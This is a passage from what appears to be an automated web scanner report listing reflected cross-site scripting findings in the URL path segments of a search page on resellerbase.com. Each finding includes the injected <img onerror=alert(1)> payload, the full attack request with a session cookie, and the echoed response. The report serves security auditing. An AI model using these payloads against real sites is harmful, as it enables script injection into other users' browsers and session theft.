X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themese933f<img src=a onerror=alert(1)>80fbf6004dd511993/kosmos/images/review/search.php]</td>
...[SNIP]...

2.4573. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b59cf<img%20src%3da%20onerror%3dalert(1)>21f23ce198b was submitted in the REST URL parameter 2. This input was echoed as b59cf<img src=a onerror=alert(1)>21f23ce198b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesb59cf<img%20src%3da%20onerror%3dalert(1)>21f23ce198b/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesb59cf<img src=a onerror=alert(1)>21f23ce198b/kosmos/images/review/search.php]</td>
...[SNIP]...

2.4574. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e5989</title><img%20src%3da%20onerror%3dalert(1)>89752615df7 was submitted in the REST URL parameter 2. This input was echoed as e5989</title><img src=a onerror=alert(1)>89752615df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themese5989</title><img%20src%3da%20onerror%3dalert(1)>89752615df7/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themese5989</title><img src=a onerror=alert(1)>89752615df7/kosmos/images/review/search.php</title>
...[SNIP]...

2.4575. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3b4d2</title><img%20src%3da%20onerror%3dalert(1)>48eeb94e6eb5bf160 was submitted in the REST URL parameter 2. This input was echoed as 3b4d2</title><img src=a onerror=alert(1)>48eeb94e6eb5bf160 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes3b4d2</title><img%20src%3da%20onerror%3dalert(1)>48eeb94e6eb5bf160/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes3b4d2</title><img src=a onerror=alert(1)>48eeb94e6eb5bf160/kosmos/images/review/search.php</title>
...[SNIP]...

2.4576. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df3f5<img%20src%3da%20onerror%3dalert(1)>263bd0f6d5cbbfbb4 was submitted in the REST URL parameter 3. This input was echoed as df3f5<img src=a onerror=alert(1)>263bd0f6d5cbbfbb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmosdf3f5<img%20src%3da%20onerror%3dalert(1)>263bd0f6d5cbbfbb4/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmosdf3f5<img src=a onerror=alert(1)>263bd0f6d5cbbfbb4/images/review/search.php]</td>
...[SNIP]...

2.4577. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload bfbb5</title><img%20src%3da%20onerror%3dalert(1)>1d7e05af986 was submitted in the REST URL parameter 3. This input was echoed as bfbb5</title><img src=a onerror=alert(1)>1d7e05af986 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmosbfbb5</title><img%20src%3da%20onerror%3dalert(1)>1d7e05af986/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmosbfbb5</title><img src=a onerror=alert(1)>1d7e05af986/images/review/search.php</title>
...[SNIP]...

2.4578. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f0c8<img%20src%3da%20onerror%3dalert(1)>808daee7634 was submitted in the REST URL parameter 3. This input was echoed as 1f0c8<img src=a onerror=alert(1)>808daee7634 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos1f0c8<img%20src%3da%20onerror%3dalert(1)>808daee7634/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos1f0c8<img src=a onerror=alert(1)>808daee7634/images/review/search.php]</td>
...[SNIP]...

2.4579. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 7c508</title><img%20src%3da%20onerror%3dalert(1)>423306722d371e94d was submitted in the REST URL parameter 3. This input was echoed as 7c508</title><img src=a onerror=alert(1)>423306722d371e94d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos7c508</title><img%20src%3da%20onerror%3dalert(1)>423306722d371e94d/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos7c508</title><img src=a onerror=alert(1)>423306722d371e94d/images/review/search.php</title>
...[SNIP]...

2.4580. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload ea2de</title><img%20src%3da%20onerror%3dalert(1)>d73109bd734cefa72 was submitted in the REST URL parameter 4. This input was echoed as ea2de</title><img src=a onerror=alert(1)>d73109bd734cefa72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/imagesea2de</title><img%20src%3da%20onerror%3dalert(1)>d73109bd734cefa72/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesea2de</title><img src=a onerror=alert(1)>d73109bd734cefa72/review/search.php</title>
...[SNIP]...

2.4581. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9cd79<img%20src%3da%20onerror%3dalert(1)>017ff7f2ea8 was submitted in the REST URL parameter 4. This input was echoed as 9cd79<img src=a onerror=alert(1)>017ff7f2ea8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images9cd79<img%20src%3da%20onerror%3dalert(1)>017ff7f2ea8/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images9cd79<img src=a onerror=alert(1)>017ff7f2ea8/review/search.php]</td>
...[SNIP]...

2.4582. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bd209<img%20src%3da%20onerror%3dalert(1)>4b95d2754a3459867 was submitted in the REST URL parameter 4. This input was echoed as bd209<img src=a onerror=alert(1)>4b95d2754a3459867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/imagesbd209<img%20src%3da%20onerror%3dalert(1)>4b95d2754a3459867/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/imagesbd209<img src=a onerror=alert(1)>4b95d2754a3459867/review/search.php]</td>
...[SNIP]...

2.4583. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload e4c99</title><img%20src%3da%20onerror%3dalert(1)>cce581de37e was submitted in the REST URL parameter 4. This input was echoed as e4c99</title><img src=a onerror=alert(1)>cce581de37e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagese4c99</title><img%20src%3da%20onerror%3dalert(1)>cce581de37e/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagese4c99</title><img src=a onerror=alert(1)>cce581de37e/review/search.php</title>
...[SNIP]...

2.4584. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 9ba67</title><img%20src%3da%20onerror%3dalert(1)>719baa501e775e85c was submitted in the REST URL parameter 5. This input was echoed as 9ba67</title><img src=a onerror=alert(1)>719baa501e775e85c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/review9ba67</title><img%20src%3da%20onerror%3dalert(1)>719baa501e775e85c/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review9ba67</title><img src=a onerror=alert(1)>719baa501e775e85c/search.php</title>
...[SNIP]...

2.4585. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2bd3<img%20src%3da%20onerror%3dalert(1)>df3a14074c9 was submitted in the REST URL parameter 5. This input was echoed as c2bd3<img src=a onerror=alert(1)>df3a14074c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/reviewc2bd3<img%20src%3da%20onerror%3dalert(1)>df3a14074c9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/reviewc2bd3<img src=a onerror=alert(1)>df3a14074c9/search.php]</td>
...[SNIP]...

2.4586. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload a3053</title><img%20src%3da%20onerror%3dalert(1)>4bcbff037c1 was submitted in the REST URL parameter 5. This input was echoed as a3053</title><img src=a onerror=alert(1)>4bcbff037c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/reviewa3053</title><img%20src%3da%20onerror%3dalert(1)>4bcbff037c1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/reviewa3053</title><img src=a onerror=alert(1)>4bcbff037c1/search.php</title>
...[SNIP]...

2.4587. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27cba<img%20src%3da%20onerror%3dalert(1)>252faeffd202e8092 was submitted in the REST URL parameter 5. This input was echoed as 27cba<img src=a onerror=alert(1)>252faeffd202e8092 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/review27cba<img%20src%3da%20onerror%3dalert(1)>252faeffd202e8092/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review27cba<img src=a onerror=alert(1)>252faeffd202e8092/search.php]</td>
...[SNIP]...

